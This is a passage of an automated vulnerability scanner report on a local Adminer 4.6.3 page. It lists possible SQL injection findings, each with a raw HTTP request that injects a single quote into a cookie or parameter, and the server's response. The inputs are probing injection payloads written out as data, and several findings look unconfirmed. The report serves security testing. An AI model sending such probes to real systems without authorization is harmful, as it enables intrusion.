Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MGI3M2NlZDJkZGY4YzhmNTI4MDlmZDI1ZDAzYzY4YWY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.12. http://localhost/adminer/adminer-4.6.3.php [adminer_sid cookie]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The adminer_sid cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the adminer_sid cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294'; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:41 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_sid=1kecskm8kfkv29ijj9r4rthps3; path=/adminer/adminer-4.6.3.php; HttpOnly
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-Y2NiNzdkM2EzMjJmODAwYjRiNmQwMzQ3OGZjZWUyZmY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4522
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.13. http://localhost/adminer/adminer-4.6.3.php [auth%5bdb%5d parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bdb%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bdb%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfc&auth%5bpassword%5d=p8G%21c2e%21P1&auth%5bdb%5d=VICYSKOs'

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:11:06 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:11:07 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDIwNjMxYTU1MDVjOWZmOTQxNTM4YjQyNDI2YzY1YTQ=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4494
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.14. http://localhost/adminer/adminer-4.6.3.php [auth%5bdriver%5d parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bdriver%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bdriver%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=if12n6mpoth7rrr8db2b98pbgd; adminer_key=ee5a97bb7d42e79ebb4dfad235644413

auth%5bdriver%5d=server'&auth%5bserver%5d=hvdhksIt&auth%5busername%5d=SvdSIQmY&auth%5bpassword%5d=g3P%21p0i%21F6&auth%5bdb%5d=qYkgBFYR&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:02:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=c2VydmVyJw%3D%3D-aHZkaGtzSXQ%3D-U3ZkU0lRbVk%3D-cVlrZ0JGWVI%3D%3A6e7Uou0JbQpEG8uIZzC6UA%3D%3D; expires=Sat, 17 Nov 2018 21:02:24 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTk1NGQ5MWY4MjYyODMwMGI5NzI0YmYxYTg0NjIyYTE=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4768
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.15. http://localhost/adminer/adminer-4.6.3.php [auth%5bpassword%5d parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bpassword%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bpassword%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfc&auth%5bpassword%5d=p8G!c2e!P1'&auth%5bdb%5d=VICYSKOs

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:10:38 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:10:38 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-YmMwNGM4MmZmOTkxMGZkNDk4NWJkZTA2MzhiZmM2MGE=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4485
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.16. http://localhost/adminer/adminer-4.6.3.php [auth%5bpermanent%5d parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bpermanent%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bpermanent%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=if12n6mpoth7rrr8db2b98pbgd; adminer_key=ee5a97bb7d42e79ebb4dfad235644413

auth%5bdriver%5d=server&auth%5bserver%5d=hvdhksIt&auth%5busername%5d=SvdSIQmY&auth%5bpassword%5d=g3P%21p0i%21F6&auth%5bdb%5d=qYkgBFYR&auth%5bpermanent%5d=1'

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:13:01 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:13:01 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-ZDgwOTRkM2VmZDc2NzQ5M2U1M2IyOGVmYTdmM2M4OGY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4492
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - hvdhksIt - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.17. http://localhost/adminer/adminer-4.6.3.php [auth%5bserver%5d parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5bserver%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5bserver%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_sid=bp3upadpsu2m2m0t3rkbiuh4ip; adminer_key=a29b0ef6b673e85bda436f5358e30b8b

auth%5bdriver%5d=server&auth%5bserver%5d=gPsfQieM'&auth%5busername%5d=wWXwJEEF&auth%5bpassword%5d=x6D%21r9q%21H5&auth%5bdb%5d=AhfDADgK&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:04:04 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:04:04 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-MmIxZWQ0OWVkYjYyZjdlNDUwM2ZkZDQyZTZlMmRkYzY=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4508
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - gPsfQieM&#039; - Adminer</title>
<l
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.18. http://localhost/adminer/adminer-4.6.3.php [auth%5busername%5d parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The auth%5busername%5d parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the auth%5busername%5d parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
Cookie: adminer_sid=cdq5g34md4d7cajnffbkmv81qn; adminer_key=0a9fa6db87f98aa295dd4ecf8667248d

auth%5bdriver%5d=server&auth%5bserver%5d=WVXmekzw&auth%5busername%5d=FsyZhLfc'&auth%5bpassword%5d=p8G%21c2e%21P1&auth%5bdb%5d=VICYSKOs

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:07:57 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:07:57 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=0a9fa6db87f98aa295dd4ecf8667248d; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDMzM2Q5NGJkM2M0NmY0OWMyNzA3ZDJjN2EyZjY3NmQ=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4494
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - WVXmekzw - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.19. http://localhost/adminer/adminer-4.6.3.php [db parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The db parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the db parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK' HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=gPsfQieM&username=wWXwJEEF&db=AhfDADgK
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; adminer_sid=mbbo1fup7nl3ffo0hm3j017vk6; adminer_permanent=; adminer_lang=en

auth%5bdriver%5d=server&auth%5bserver%5d=XJQTysvL&auth%5busername%5d=kMlMpcXg&auth%5bpassword%5d=v5R%21k2f%21Q2&auth%5bdb%5d=FRepmkVM&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:04:00 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:04:00 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:04:01 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=a29b0ef6b673e85bda436f5358e30b8b; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NDMyNWMxZDRhMTBjY2UxOTljMTMyODgwZjM2MDBmNmQ=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4493
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - XJQTysvL - Adminer</title>
<link re
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.20. http://localhost/adminer/adminer-4.6.3.php [lang parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The lang parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the lang parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en'&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-YTE2MzliMzVjNzA5OGI0MjZlODhkMWZiNTBhODZhYWM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4325
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.21. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied URL parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The name of an arbitrarily supplied URL parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied URL parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?1'=1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:06:55 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:06:55 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-OTM2ZDY4MzBjYTEyYjFjMjNhYTMwMjQxMDZhZTZhNTk=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4325
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.22. http://localhost/adminer/adminer-4.6.3.php [name of an arbitrarily supplied body parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The name of an arbitrarily supplied body parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied body parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f

lang=en&token=240285%3a176068&1'=1

Response

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:06:20 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:06:20 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NGE1MDdhYTBlYzQ2MDZhZDliNDU1ZjEyODI3MGM4ZTk=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
<option value="pgsql">PostgreSQL<option value="oracle">
...[SNIP]...
1.23. http://localhost/adminer/adminer-4.6.3.php [server parameter]
Previous  Next

Summary

Severity:   High
Confidence:   Firm
Host:   http://localhost
Path:   /adminer/adminer-4.6.3.php

Issue detail

The server parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the server parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

POST /adminer/adminer-4.6.3.php?server=hvdhksIt'&username=SvdSIQmY&db=qYkgBFYR HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php?server=hvdhksIt&username=SvdSIQmY&db=qYkgBFYR
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; adminer_sid=tm6hb8tq45oqkfal3vj39svop6; adminer_permanent=; adminer_lang=en

auth%5bdriver%5d=server&auth%5bserver%5d=dAYPdYZc&auth%5busername%5d=WQrdyhEb&auth%5bpassword%5d=n0R%21m9v%21J1&auth%5bdb%5d=ctITZfwz&auth%5bpermanent%5d=1

Response

HTTP/1.1 403 Forbidden
Date: Thu, 18 Oct 2018 21:02:31 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:02:31 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_permanent=; expires=Sat, 17 Nov 2018 21:02:31 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=ee5a97bb7d42e79ebb4dfad235644413; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
